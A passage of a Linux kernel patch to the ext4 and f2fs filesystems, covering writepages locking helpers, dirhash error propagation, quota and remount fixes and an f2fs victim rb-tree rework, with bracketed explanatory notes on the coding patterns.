+ 		ext4_restore_inline_data(handle, inode, iloc, buf, inline_size);
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 0b87665aaff13..bfbfec99b1345 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -2957,13 +2957,14 @@ static int ext4_writepages(struct address_space *mapping,
+ 		.can_map = 1,
+ 	};
+ 	int ret;
++	int alloc_ctx;
+ 
+ 	if (unlikely(ext4_forced_shutdown(EXT4_SB(sb))))
+ 		return -EIO;
+ 
+-	percpu_down_read(&EXT4_SB(sb)->s_writepages_rwsem);
++	alloc_ctx = ext4_writepages_down_read(sb);
+ 	ret = ext4_do_writepages(&mpd);
+-	percpu_up_read(&EXT4_SB(sb)->s_writepages_rwsem);
++	ext4_writepages_up_read(sb, alloc_ctx);
+ 
+ 	return ret;
+ }
+@@ -2991,17 +2992,18 @@ static int ext4_dax_writepages(struct address_space *mapping,
+ 	long nr_to_write = wbc->nr_to_write;
+ 	struct inode *inode = mapping->host;
+ 	struct ext4_sb_info *sbi = EXT4_SB(mapping->host->i_sb);
++	int alloc_ctx;
+ 
+ 	if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
+ 		return -EIO;
+ 
+-	percpu_down_read(&sbi->s_writepages_rwsem);
++	alloc_ctx = ext4_writepages_down_read(inode->i_sb);
+ 	trace_ext4_writepages(inode, wbc);
+ 
+ 	ret = dax_writeback_mapping_range(mapping, sbi->s_daxdev, wbc);
+ 	trace_ext4_writepages_result(inode, wbc, ret,
+ 				     nr_to_write - wbc->nr_to_write);
+-	percpu_up_read(&sbi->s_writepages_rwsem);
++	ext4_writepages_up_read(inode->i_sb, alloc_ctx);
+ 	return ret;
+ }
+ 
+@@ -3575,7 +3577,7 @@ static int ext4_iomap_overwrite_begin(struct inode *inode, loff_t offset,
+ 	 */
+ 	flags &= ~IOMAP_WRITE;
+ 	ret = ext4_iomap_begin(inode, offset, length, flags, iomap, srcmap);
+-	WARN_ON_ONCE(iomap->type != IOMAP_MAPPED);
++	WARN_ON_ONCE(!ret && iomap->type != IOMAP_MAPPED);
+ 	return ret;
+ }
+ 
+@@ -6124,7 +6126,7 @@ int ext4_change_inode_journal_flag(struct inode *inode, int val)
+ 	journal_t *journal;
+ 	handle_t *handle;
+ 	int err;
+-	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
++	int alloc_ctx;
+ 
+ 	/*
+ 	 * We have to be very careful here: changing a data block's
+@@ -6162,7 +6164,7 @@ int ext4_change_inode_journal_flag(struct inode *inode, int val)
+ 		}
+ 	}
+ 
+-	percpu_down_write(&sbi->s_writepages_rwsem);
++	alloc_ctx = ext4_writepages_down_write(inode->i_sb);
+ 	jbd2_journal_lock_updates(journal);
+ 
+ 	/*
+@@ -6179,7 +6181,7 @@ int ext4_change_inode_journal_flag(struct inode *inode, int val)
+ 		err = jbd2_journal_flush(journal, 0);
+ 		if (err < 0) {
+ 			jbd2_journal_unlock_updates(journal);
+-			percpu_up_write(&sbi->s_writepages_rwsem);
++			ext4_writepages_up_write(inode->i_sb, alloc_ctx);
+ 			return err;
+ 		}
+ 		ext4_clear_inode_flag(inode, EXT4_INODE_JOURNAL_DATA);
+@@ -6187,7 +6189,7 @@ int ext4_change_inode_journal_flag(struct inode *inode, int val)
+ 	ext4_set_aops(inode);
+ 
+ 	jbd2_journal_unlock_updates(journal);
+-	percpu_up_write(&sbi->s_writepages_rwsem);
++	ext4_writepages_up_write(inode->i_sb, alloc_ctx);
+ 
+ 	if (val)
+ 		filemap_invalidate_unlock(inode->i_mapping);
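[Note: ext4_writepages_down_read()/..._up_read() and the write-side pair are new helpers defined in fs/ext4/ext4.h elsewhere in this patch. Consistent with the call sites above, which thread an alloc_ctx value from lock to unlock, a plausible sketch is that they combine the percpu rwsem with memalloc_nofs_save()/memalloc_nofs_restore() so filesystem reclaim cannot recurse while writepages runs:

	static inline int ext4_writepages_down_read(struct super_block *sb)
	{
		percpu_down_read(&EXT4_SB(sb)->s_writepages_rwsem);
		return memalloc_nofs_save();	/* ctx handed back to the caller */
	}

	static inline void ext4_writepages_up_read(struct super_block *sb, int ctx)
	{
		memalloc_nofs_restore(ctx);
		percpu_up_read(&EXT4_SB(sb)->s_writepages_rwsem);
	}
]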
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 5b2ae37a8b80b..5639a4cf7ff98 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -4820,7 +4820,11 @@ ext4_mb_release_group_pa(struct ext4_buddy *e4b,
+ 	trace_ext4_mb_release_group_pa(sb, pa);
+ 	BUG_ON(pa->pa_deleted == 0);
+ 	ext4_get_group_no_and_offset(sb, pa->pa_pstart, &group, &bit);
+-	BUG_ON(group != e4b->bd_group && pa->pa_len != 0);
++	if (unlikely(group != e4b->bd_group && pa->pa_len != 0)) {
++		ext4_warning(sb, "bad group: expected %u, group %u, pa_start %llu",
++			     e4b->bd_group, group, pa->pa_pstart);
++		return 0;
++	}
+ 	mb_free_blocks(pa->pa_inode, e4b, bit, pa->pa_len);
+ 	atomic_add(pa->pa_len, &EXT4_SB(sb)->s_mb_discarded);
+ 	trace_ext4_mballoc_discard(sb, NULL, group, bit, pa->pa_len);
+diff --git a/fs/ext4/migrate.c b/fs/ext4/migrate.c
+index a19a9661646eb..d98ac2af8199f 100644
+--- a/fs/ext4/migrate.c
++++ b/fs/ext4/migrate.c
+@@ -408,7 +408,6 @@ static int free_ext_block(handle_t *handle, struct inode *inode)
+ 
+ int ext4_ext_migrate(struct inode *inode)
+ {
+-	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
+ 	handle_t *handle;
+ 	int retval = 0, i;
+ 	__le32 *i_data;
+@@ -418,6 +417,7 @@ int ext4_ext_migrate(struct inode *inode)
+ 	unsigned long max_entries;
+ 	__u32 goal, tmp_csum_seed;
+ 	uid_t owner[2];
++	int alloc_ctx;
+ 
+ 	/*
+ 	 * If the filesystem does not support extents, or the inode
+@@ -434,7 +434,7 @@ int ext4_ext_migrate(struct inode *inode)
+ 		 */
+ 		return retval;
+ 
+-	percpu_down_write(&sbi->s_writepages_rwsem);
++	alloc_ctx = ext4_writepages_down_write(inode->i_sb);
+ 
+ 	/*
+ 	 * Worst case we can touch the allocation bitmaps and a block
+@@ -586,7 +586,7 @@ out_tmp_inode:
+ 	unlock_new_inode(tmp_inode);
+ 	iput(tmp_inode);
+ out_unlock:
+-	percpu_up_write(&sbi->s_writepages_rwsem);
++	ext4_writepages_up_write(inode->i_sb, alloc_ctx);
+ 	return retval;
+ }
+ 
+@@ -605,6 +605,7 @@ int ext4_ind_migrate(struct inode *inode)
+ 	ext4_fsblk_t			blk;
+ 	handle_t			*handle;
+ 	int				ret, ret2 = 0;
++	int				alloc_ctx;
+ 
+ 	if (!ext4_has_feature_extents(inode->i_sb) ||
+ 	    (!ext4_test_inode_flag(inode, EXT4_INODE_EXTENTS)))
+@@ -621,7 +622,7 @@ int ext4_ind_migrate(struct inode *inode)
+ 	if (test_opt(inode->i_sb, DELALLOC))
+ 		ext4_alloc_da_blocks(inode);
+ 
+-	percpu_down_write(&sbi->s_writepages_rwsem);
++	alloc_ctx = ext4_writepages_down_write(inode->i_sb);
+ 
+ 	handle = ext4_journal_start(inode, EXT4_HT_MIGRATE, 1);
+ 	if (IS_ERR(handle)) {
+@@ -665,6 +666,6 @@ errout:
+ 	ext4_journal_stop(handle);
+ 	up_write(&EXT4_I(inode)->i_data_sem);
+ out_unlock:
+-	percpu_up_write(&sbi->s_writepages_rwsem);
++	ext4_writepages_up_write(inode->i_sb, alloc_ctx);
+ 	return ret;
+ }
+diff --git a/fs/ext4/mmp.c b/fs/ext4/mmp.c
+index 4681fff6665fe..46735ce315b5a 100644
+--- a/fs/ext4/mmp.c
++++ b/fs/ext4/mmp.c
+@@ -39,28 +39,36 @@ static void ext4_mmp_csum_set(struct super_block *sb, struct mmp_struct *mmp)
+  * Write the MMP block using REQ_SYNC to try to get the block on-disk
+  * faster.
+  */
+-static int write_mmp_block(struct super_block *sb, struct buffer_head *bh)
++static int write_mmp_block_thawed(struct super_block *sb,
++				  struct buffer_head *bh)
+ {
+ 	struct mmp_struct *mmp = (struct mmp_struct *)(bh->b_data);
+ 
+-	/*
+-	 * We protect against freezing so that we don't create dirty buffers
+-	 * on frozen filesystem.
+-	 */
+-	sb_start_write(sb);
+ 	ext4_mmp_csum_set(sb, mmp);
+ 	lock_buffer(bh);
+ 	bh->b_end_io = end_buffer_write_sync;
+ 	get_bh(bh);
+ 	submit_bh(REQ_OP_WRITE | REQ_SYNC | REQ_META | REQ_PRIO, bh);
+ 	wait_on_buffer(bh);
+-	sb_end_write(sb);
+ 	if (unlikely(!buffer_uptodate(bh)))
+ 		return -EIO;
+-
+ 	return 0;
+ }
+ 
++static int write_mmp_block(struct super_block *sb, struct buffer_head *bh)
++{
++	int err;
++
++	/*
++	 * We protect against freezing so that we don't create dirty buffers
++	 * on frozen filesystem.
++	 */
++	sb_start_write(sb);
++	err = write_mmp_block_thawed(sb, bh);
++	sb_end_write(sb);
++	return err;
++}
++
+ /*
+  * Read the MMP block. It _must_ be read from disk and hence we clear the
+  * uptodate flag on the buffer.
+@@ -340,7 +348,11 @@ skip:
+ 	seq = mmp_new_seq();
+ 	mmp->mmp_seq = cpu_to_le32(seq);
+ 
+-	retval = write_mmp_block(sb, bh);
++	/*
++	 * On mount / remount we are protected against fs freezing (by s_umount
++	 * semaphore) and grabbing freeze protection upsets lockdep
++	 */
++	retval = write_mmp_block_thawed(sb, bh);
+ 	if (retval)
+ 		goto failed;
+ 
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 604ee458f31d7..6195e36576f10 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -674,7 +674,7 @@ static struct stats dx_show_leaf(struct inode *dir,
+ 				len = de->name_len;
+ 				if (!IS_ENCRYPTED(dir)) {
+ 					/* Directory is not encrypted */
+-					ext4fs_dirhash(dir, de->name,
++					(void) ext4fs_dirhash(dir, de->name,
+ 						de->name_len, &h);
+ 					printk("%*.s:(U)%x.%u ", len,
+ 					       name, h.hash,
+@@ -709,8 +709,9 @@ static struct stats dx_show_leaf(struct inode *dir,
+ 					if (IS_CASEFOLDED(dir))
+ 						h.hash = EXT4_DIRENT_HASH(de);
+ 					else
+-						ext4fs_dirhash(dir, de->name,
+-						       de->name_len, &h);
++						(void) ext4fs_dirhash(dir,
++							de->name,
++							de->name_len, &h);
+ 					printk("%*.s:(E)%x.%u ", len, name,
+ 					       h.hash, (unsigned) ((char *) de
+ 								   - base));
+@@ -720,7 +721,8 @@ static struct stats dx_show_leaf(struct inode *dir,
+ #else
+ 				int len = de->name_len;
+ 				char *name = de->name;
+-				ext4fs_dirhash(dir, de->name, de->name_len, &h);
++				(void) ext4fs_dirhash(dir, de->name,
++						      de->name_len, &h);
+ 				printk("%*.s:%x.%u ", len, name, h.hash,
+ 				       (unsigned) ((char *) de - base));
+ #endif
+@@ -849,8 +851,14 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
+ 	hinfo->seed = EXT4_SB(dir->i_sb)->s_hash_seed;
+ 	/* hash is already computed for encrypted casefolded directory */
+ 	if (fname && fname_name(fname) &&
+-				!(IS_ENCRYPTED(dir) && IS_CASEFOLDED(dir)))
+-		ext4fs_dirhash(dir, fname_name(fname), fname_len(fname), hinfo);
++	    !(IS_ENCRYPTED(dir) && IS_CASEFOLDED(dir))) {
++		int ret = ext4fs_dirhash(dir, fname_name(fname),
++					 fname_len(fname), hinfo);
++		if (ret < 0) {
++			ret_err = ERR_PTR(ret);
++			goto fail;
++		}
++	}
+ 	hash = hinfo->hash;
+ 
+ 	if (root->info.unused_flags & 1) {
+@@ -1111,7 +1119,12 @@ static int htree_dirblock_to_tree(struct file *dir_file,
+ 				hinfo->minor_hash = 0;
+ 			}
+ 		} else {
+-			ext4fs_dirhash(dir, de->name, de->name_len, hinfo);
++			err = ext4fs_dirhash(dir, de->name,
++					     de->name_len, hinfo);
++			if (err < 0) {
++				count = err;
++				goto errout;
++			}
+ 		}
+ 		if ((hinfo->hash < start_hash) ||
+ 		    ((hinfo->hash == start_hash) &&
+@@ -1313,8 +1326,12 @@ static int dx_make_map(struct inode *dir, struct buffer_head *bh,
+ 		if (de->name_len && de->inode) {
+ 			if (ext4_hash_in_dirent(dir))
+ 				h.hash = EXT4_DIRENT_HASH(de);
+-			else
+-				ext4fs_dirhash(dir, de->name, de->name_len, &h);
++			else {
++				int err = ext4fs_dirhash(dir, de->name,
++						     de->name_len, &h);
++				if (err < 0)
++					return err;
++			}
+ 			map_tail--;
+ 			map_tail->hash = h.hash;
+ 			map_tail->offs = ((char *) de - base)>>2;
+@@ -1452,10 +1469,9 @@ int ext4_fname_setup_ci_filename(struct inode *dir, const struct qstr *iname,
+ 	hinfo->hash_version = DX_HASH_SIPHASH;
+ 	hinfo->seed = NULL;
+ 	if (cf_name->name)
+-		ext4fs_dirhash(dir, cf_name->name, cf_name->len, hinfo);
++		return ext4fs_dirhash(dir, cf_name->name, cf_name->len, hinfo);
+ 	else
+-		ext4fs_dirhash(dir, iname->name, iname->len, hinfo);
+-	return 0;
++		return ext4fs_dirhash(dir, iname->name, iname->len, hinfo);
+ }
+ #endif
+ 
+@@ -2298,10 +2314,15 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
+ 	fname->hinfo.seed = EXT4_SB(dir->i_sb)->s_hash_seed;
+ 
+ 	/* casefolded encrypted hashes are computed on fname setup */
+-	if (!ext4_hash_in_dirent(dir))
+-		ext4fs_dirhash(dir, fname_name(fname),
+-				fname_len(fname), &fname->hinfo);
+-
++	if (!ext4_hash_in_dirent(dir)) {
++		int err = ext4fs_dirhash(dir, fname_name(fname),
++					 fname_len(fname), &fname->hinfo);
++		if (err < 0) {
++			brelse(bh2);
++			brelse(bh);
++			return err;
++		}
++	}
+ 	memset(frames, 0, sizeof(frames));
+ 	frame = frames;
+ 	frame->entries = entries;
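[Note: every namei.c hunk above is the same mechanical conversion — ext4fs_dirhash() now returns an int and can fail, so callers must check it instead of consuming a possibly bogus hash. The pattern each call site ends up with:

	struct dx_hash_info hinfo;
	int err;

	err = ext4fs_dirhash(dir, de->name, de->name_len, &hinfo);
	if (err < 0)
		return err;	/* propagate; never use hinfo.hash on error */
]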
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index e79ca9ef98316..2565fb02b7ab5 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -3195,11 +3195,9 @@ static __le16 ext4_group_desc_csum(struct super_block *sb, __u32 block_group,
+ 	crc = crc16(crc, (__u8 *)gdp, offset);
+ 	offset += sizeof(gdp->bg_checksum); /* skip checksum */
+ 	/* for checksum of struct ext4_group_desc do the rest...*/
+-	if (ext4_has_feature_64bit(sb) &&
+-	    offset < le16_to_cpu(sbi->s_es->s_desc_size))
++	if (ext4_has_feature_64bit(sb) && offset < sbi->s_desc_size)
+ 		crc = crc16(crc, (__u8 *)gdp + offset,
+-			    le16_to_cpu(sbi->s_es->s_desc_size) -
+-				offset);
++			    sbi->s_desc_size - offset);
+ 
+ out:
+ 	return cpu_to_le16(crc);
+@@ -6568,9 +6566,6 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	}
+ 
+ #ifdef CONFIG_QUOTA
+-	/* Release old quota file names */
+-	for (i = 0; i < EXT4_MAXQUOTAS; i++)
+-		kfree(old_opts.s_qf_names[i]);
+ 	if (enable_quota) {
+ 		if (sb_any_quota_suspended(sb))
+ 			dquot_resume(sb, -1);
+@@ -6580,6 +6575,9 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 				goto restore_opts;
+ 		}
+ 	}
++	/* Release old quota file names */
++	for (i = 0; i < EXT4_MAXQUOTAS; i++)
++		kfree(old_opts.s_qf_names[i]);
+ #endif
+ 	if (!test_opt(sb, BLOCK_VALIDITY) && sbi->s_system_blks)
+ 		ext4_release_system_zone(sb);
+@@ -6590,6 +6588,13 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	return 0;
+ 
+ restore_opts:
++	/*
++	 * If there was a failing r/w to ro transition, we may need to
++	 * re-enable quota
++	 */
++	if ((sb->s_flags & SB_RDONLY) && !(old_sb_flags & SB_RDONLY) &&
++	    sb_any_quota_suspended(sb))
++		dquot_resume(sb, -1);
+ 	sb->s_flags = old_sb_flags;
+ 	sbi->s_mount_opt = old_opts.s_mount_opt;
+ 	sbi->s_mount_opt2 = old_opts.s_mount_opt2;
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index f66c3fae90584..30f7c79ced471 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -2581,6 +2581,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 		.in_inode = !!entry->e_value_inum,
+ 	};
+ 	struct ext4_xattr_ibody_header *header = IHDR(inode, raw_inode);
++	int needs_kvfree = 0;
+ 	int error;
+ 
+ 	is = kzalloc(sizeof(struct ext4_xattr_ibody_find), GFP_NOFS);
+@@ -2603,7 +2604,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 			error = -ENOMEM;
+ 			goto out;
+ 		}
+-
++		needs_kvfree = 1;
+ 		error = ext4_xattr_inode_get(inode, entry, buffer, value_size);
+ 		if (error)
+ 			goto out;
+@@ -2642,7 +2643,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 
+ out:
+ 	kfree(b_entry_name);
+-	if (entry->e_value_inum && buffer)
++	if (needs_kvfree && buffer)
+ 		kvfree(buffer);
+ 	if (is)
+ 		brelse(is->iloc.bh);
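[Note: the xattr.c fix is an ownership-tracking pattern — free the temporary buffer based on a local flag set at allocation time rather than by re-testing entry->e_value_inum at the out label, the assumption being that *entry may have been shifted or rewritten by the time the function unwinds. Reduced to its skeleton:

	void *buffer = NULL;
	int needs_kvfree = 0;

	if (value_needs_copy) {			/* illustrative condition */
		buffer = kvmalloc(value_size, GFP_NOFS);
		if (!buffer)
			return -ENOMEM;
		needs_kvfree = 1;		/* we own the buffer from here on */
	}
	/* ... work that may invalidate *entry ... */
	if (needs_kvfree)
		kvfree(buffer);			/* keyed off the local flag only */
]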
+diff --git a/fs/f2fs/extent_cache.c b/fs/f2fs/extent_cache.c
+index 342af24b2f8cf..3949ce2b484d9 100644
+--- a/fs/f2fs/extent_cache.c
++++ b/fs/f2fs/extent_cache.c
+@@ -179,29 +179,6 @@ struct rb_entry *f2fs_lookup_rb_tree(struct rb_root_cached *root,
+ 	return re;
+ }
+ 
+-struct rb_node **f2fs_lookup_rb_tree_ext(struct f2fs_sb_info *sbi,
+-					struct rb_root_cached *root,
+-					struct rb_node **parent,
+-					unsigned long long key, bool *leftmost)
+-{
+-	struct rb_node **p = &root->rb_root.rb_node;
+-	struct rb_entry *re;
+-
+-	while (*p) {
+-		*parent = *p;
+-		re = rb_entry(*parent, struct rb_entry, rb_node);
+-
+-		if (key < re->key) {
+-			p = &(*p)->rb_left;
+-		} else {
+-			p = &(*p)->rb_right;
+-			*leftmost = false;
+-		}
+-	}
+-
+-	return p;
+-}
+-
+ struct rb_node **f2fs_lookup_rb_tree_for_insert(struct f2fs_sb_info *sbi,
+ 				struct rb_root_cached *root,
+ 				struct rb_node **parent,
+@@ -310,7 +287,7 @@ lookup_neighbors:
+ }
+ 
+ bool f2fs_check_rb_tree_consistence(struct f2fs_sb_info *sbi,
+-				struct rb_root_cached *root, bool check_key)
++				struct rb_root_cached *root)
+ {
+ #ifdef CONFIG_F2FS_CHECK_FS
+ 	struct rb_node *cur = rb_first_cached(root), *next;
+@@ -327,23 +304,12 @@ bool f2fs_check_rb_tree_consistence(struct f2fs_sb_info *sbi,
+ 		cur_re = rb_entry(cur, struct rb_entry, rb_node);
+ 		next_re = rb_entry(next, struct rb_entry, rb_node);
+ 
+-		if (check_key) {
+-			if (cur_re->key > next_re->key) {
+-				f2fs_info(sbi, "inconsistent rbtree, "
+-					"cur(%llu) next(%llu)",
+-					cur_re->key, next_re->key);
+-				return false;
+-			}
+-			goto next;
+-		}
+-
+ 		if (cur_re->ofs + cur_re->len > next_re->ofs) {
+ 			f2fs_info(sbi, "inconsistent rbtree, cur(%u, %u) next(%u, %u)",
+ 				  cur_re->ofs, cur_re->len,
+ 				  next_re->ofs, next_re->len);
+ 			return false;
+ 		}
+-next:
+ 		cur = next;
+ 	}
+ #endif
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 42962ee0a1179..8f01d2344409a 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -629,13 +629,8 @@ enum extent_type {
+ 
+ struct rb_entry {
+ 	struct rb_node rb_node;		/* rb node located in rb-tree */
+-	union {
+-		struct {
+-			unsigned int ofs;	/* start offset of the entry */
+-			unsigned int len;	/* length of the entry */
+-		};
+-		unsigned long long key;		/* 64-bits key */
+-	} __packed;
++	unsigned int ofs;		/* start offset of the entry */
++	unsigned int len;		/* length of the entry */
+ };
+ 
+ struct extent_info {
+@@ -4164,10 +4159,6 @@ void f2fs_leave_shrinker(struct f2fs_sb_info *sbi);
+  */
+ struct rb_entry *f2fs_lookup_rb_tree(struct rb_root_cached *root,
+ 				struct rb_entry *cached_re, unsigned int ofs);
+-struct rb_node **f2fs_lookup_rb_tree_ext(struct f2fs_sb_info *sbi,
+-				struct rb_root_cached *root,
+-				struct rb_node **parent,
+-				unsigned long long key, bool *left_most);
+ struct rb_node **f2fs_lookup_rb_tree_for_insert(struct f2fs_sb_info *sbi,
+ 				struct rb_root_cached *root,
+ 				struct rb_node **parent,
+@@ -4178,7 +4169,7 @@ struct rb_entry *f2fs_lookup_rb_tree_ret(struct rb_root_cached *root,
+ 		struct rb_node ***insert_p, struct rb_node **insert_parent,
+ 		bool force, bool *leftmost);
+ bool f2fs_check_rb_tree_consistence(struct f2fs_sb_info *sbi,
+-				struct rb_root_cached *root, bool check_key);
++				struct rb_root_cached *root);
+ void f2fs_init_extent_tree(struct inode *inode);
+ void f2fs_drop_extent_tree(struct inode *inode);
+ void f2fs_destroy_extent_node(struct inode *inode);
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index 72cda2f9380f2..97426be7e07de 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -392,40 +392,95 @@ static unsigned int count_bits(const unsigned long *addr,
+ 	return sum;
+ }
+ 
+-static struct victim_entry *attach_victim_entry(struct f2fs_sb_info *sbi,
+-				unsigned long long mtime, unsigned int segno,
+-				struct rb_node *parent, struct rb_node **p,
+-				bool left_most)
++static bool f2fs_check_victim_tree(struct f2fs_sb_info *sbi,
++				struct rb_root_cached *root)
++{
++#ifdef CONFIG_F2FS_CHECK_FS
++	struct rb_node *cur = rb_first_cached(root), *next;
++	struct victim_entry *cur_ve, *next_ve;
++
++	while (cur) {
++		next = rb_next(cur);
++		if (!next)
++			return true;
++
++		cur_ve = rb_entry(cur, struct victim_entry, rb_node);
++		next_ve = rb_entry(next, struct victim_entry, rb_node);
++
++		if (cur_ve->mtime > next_ve->mtime) {
++			f2fs_info(sbi, "broken victim_rbtree, "
++				"cur_mtime(%llu) next_mtime(%llu)",
++				cur_ve->mtime, next_ve->mtime);
++			return false;
++		}
++		cur = next;
++	}
++#endif
++	return true;
++}
++
++static struct victim_entry *__lookup_victim_entry(struct f2fs_sb_info *sbi,
++					unsigned long long mtime)
++{
++	struct atgc_management *am = &sbi->am;
++	struct rb_node *node = am->root.rb_root.rb_node;
++	struct victim_entry *ve = NULL;
++
++	while (node) {
++		ve = rb_entry(node, struct victim_entry, rb_node);
++
++		if (mtime < ve->mtime)
++			node = node->rb_left;
++		else
++			node = node->rb_right;
++	}
++	return ve;
++}
++
++static struct victim_entry *__create_victim_entry(struct f2fs_sb_info *sbi,
++		unsigned long long mtime, unsigned int segno)
+ {
+ 	struct atgc_management *am = &sbi->am;
+ 	struct victim_entry *ve;
+ 
+-	ve =  f2fs_kmem_cache_alloc(victim_entry_slab,
+-				GFP_NOFS, true, NULL);
++	ve =  f2fs_kmem_cache_alloc(victim_entry_slab, GFP_NOFS, true, NULL);
+ 
+ 	ve->mtime = mtime;
+ 	ve->segno = segno;
+ 
+-	rb_link_node(&ve->rb_node, parent, p);
+-	rb_insert_color_cached(&ve->rb_node, &am->root, left_most);
+-
+ 	list_add_tail(&ve->list, &am->victim_list);
+-
+ 	am->victim_count++;
+ 
+ 	return ve;
+ }
+ 
+-static void insert_victim_entry(struct f2fs_sb_info *sbi,
++static void __insert_victim_entry(struct f2fs_sb_info *sbi,
+ 				unsigned long long mtime, unsigned int segno)
+ {
+ 	struct atgc_management *am = &sbi->am;
+-	struct rb_node **p;
++	struct rb_root_cached *root = &am->root;
++	struct rb_node **p = &root->rb_root.rb_node;
+ 	struct rb_node *parent = NULL;
++	struct victim_entry *ve;
+ 	bool left_most = true;
+ 
+-	p = f2fs_lookup_rb_tree_ext(sbi, &am->root, &parent, mtime, &left_most);
+-	attach_victim_entry(sbi, mtime, segno, parent, p, left_most);
++	/* look up rb tree to find parent node */
++	while (*p) {
++		parent = *p;
++		ve = rb_entry(parent, struct victim_entry, rb_node);
++
++		if (mtime < ve->mtime) {
++			p = &(*p)->rb_left;
++		} else {
++			p = &(*p)->rb_right;
++			left_most = false;
++		}
++	}
++
++	ve = __create_victim_entry(sbi, mtime, segno);
++
++	rb_link_node(&ve->rb_node, parent, p);
++	rb_insert_color_cached(&ve->rb_node, root, left_most);
+ }
+ 
+ static void add_victim_entry(struct f2fs_sb_info *sbi,
+@@ -461,19 +516,7 @@ static void add_victim_entry(struct f2fs_sb_info *sbi,
+ 	if (sit_i->dirty_max_mtime - mtime < p->age_threshold)
+ 		return;
+ 
+-	insert_victim_entry(sbi, mtime, segno);
+-}
+-
+-static struct rb_node *lookup_central_victim(struct f2fs_sb_info *sbi,
+-						struct victim_sel_policy *p)
+-{
+-	struct atgc_management *am = &sbi->am;
+-	struct rb_node *parent = NULL;
+-	bool left_most;
+-
+-	f2fs_lookup_rb_tree_ext(sbi, &am->root, &parent, p->age, &left_most);
+-
+-	return parent;
++	__insert_victim_entry(sbi, mtime, segno);
+ }
+ 
+ static void atgc_lookup_victim(struct f2fs_sb_info *sbi,
+@@ -483,7 +526,6 @@ static void atgc_lookup_victim(struct f2fs_sb_info *sbi,
+ 	struct atgc_management *am = &sbi->am;
+ 	struct rb_root_cached *root = &am->root;
+ 	struct rb_node *node;
+-	struct rb_entry *re;
+ 	struct victim_entry *ve;
+ 	unsigned long long total_time;
+ 	unsigned long long age, u, accu;
+@@ -510,12 +552,10 @@ static void atgc_lookup_victim(struct f2fs_sb_info *sbi,
+ 
+ 	node = rb_first_cached(root);
+ next:
+-	re = rb_entry_safe(node, struct rb_entry, rb_node);
+-	if (!re)
++	ve = rb_entry_safe(node, struct victim_entry, rb_node);
++	if (!ve)
+ 		return;
+ 
+-	ve = (struct victim_entry *)re;
+-
+ 	if (ve->mtime >= max_mtime || ve->mtime < min_mtime)
+ 		goto skip;
+ 
+@@ -557,8 +597,6 @@ static void atssr_lookup_victim(struct f2fs_sb_info *sbi,
+ {
+ 	struct sit_info *sit_i = SIT_I(sbi);
+ 	struct atgc_management *am = &sbi->am;
+-	struct rb_node *node;
+-	struct rb_entry *re;
+ 	struct victim_entry *ve;
+ 	unsigned long long age;
+ 	unsigned long long max_mtime = sit_i->dirty_max_mtime;
+@@ -568,25 +606,22 @@ static void atssr_lookup_victim(struct f2fs_sb_info *sbi,
+ 	unsigned int dirty_threshold = max(am->max_candidate_count,
+ 					am->candidate_ratio *
+ 					am->victim_count / 100);
+-	unsigned int cost;
+-	unsigned int iter = 0;
++	unsigned int cost, iter;
+ 	int stage = 0;
+ 
+ 	if (max_mtime < min_mtime)
+ 		return;
+ 	max_mtime += 1;
+ next_stage:
+-	node = lookup_central_victim(sbi, p);
++	iter = 0;
++	ve = __lookup_victim_entry(sbi, p->age);
+ next_node:
+-	re = rb_entry_safe(node, struct rb_entry, rb_node);
+-	if (!re) {
+-		if (stage == 0)
+-			goto skip_stage;
++	if (!ve) {
++		if (stage++ == 0)
++			goto next_stage;
+ 		return;
+ 	}
+ 
+-	ve = (struct victim_entry *)re;
+-
+ 	if (ve->mtime >= max_mtime || ve->mtime < min_mtime)
+ 		goto skip_node;
+ 
+@@ -612,24 +647,20 @@ next_node:
+ 	}
+ skip_node:
+ 	if (iter < dirty_threshold) {
+-		if (stage == 0)
+-			node = rb_prev(node);
+-		else if (stage == 1)
+-			node = rb_next(node);
++		ve = rb_entry(stage == 0 ? rb_prev(&ve->rb_node) :
++					rb_next(&ve->rb_node),
++					struct victim_entry, rb_node);
+ 		goto next_node;
+ 	}
+-skip_stage:
+-	if (stage < 1) {
+-		stage++;
+-		iter = 0;
++
++	if (stage++ == 0)
+ 		goto next_stage;
+-	}
+ }
++
+ static void lookup_victim_by_age(struct f2fs_sb_info *sbi,
+ 						struct victim_sel_policy *p)
+ {
+-	f2fs_bug_on(sbi, !f2fs_check_rb_tree_consistence(sbi,
+-						&sbi->am.root, true));
++	f2fs_bug_on(sbi, !f2fs_check_victim_tree(sbi, &sbi->am.root));
+ 
+ 	if (p->gc_mode == GC_AT)
+ 		atgc_lookup_victim(sbi, p);
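[Note: with the generic rb_entry/f2fs_lookup_rb_tree_ext layer gone, gc.c now open-codes the standard kernel idiom for inserting into an rb_root_cached ordered by key. For reference, the idiom in isolation — type and function names here are illustrative, not part of the patch:

	#include <linux/rbtree.h>

	struct sample_node {
		struct rb_node rb;
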